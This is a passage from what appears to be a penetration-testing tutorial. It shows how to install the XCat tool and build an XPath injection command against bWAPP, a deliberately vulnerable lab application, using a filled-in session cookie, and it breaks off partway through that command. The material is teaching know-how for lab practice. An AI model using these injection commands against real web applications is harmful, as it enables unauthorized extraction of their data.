XPath injection with XCat

XCat is a tool written in Python 3, which can help you retrieve information using XPath injection vulnerabilities. It is not included by default in Kali Linux, but it can easily be added. You need to have Python 3 and pip installed in Kali Linux, and then just run the following in Terminal:

apt-get install python3-pip
pip3 install xcat

Once XCat is installed, you need to be authenticated in bWAPP to get the vulnerable URL and cookie, so you can issue a command with the following structure:

xcat -m <http_method> -c "<cookie value>" <URL_without_parameters> <injecable_parameter> <parameter1=value> <parameter2=value> -t "<text_in_true_results>" 

In this case, the command would be as follows:

xcat -m GET -c "PHPSESSID=kbh3orjn6b2gpimethf0ucq241;JSESSIONID=9D7765D7D1F2A9FCCC5D972A043F9867;security_level=0" ...

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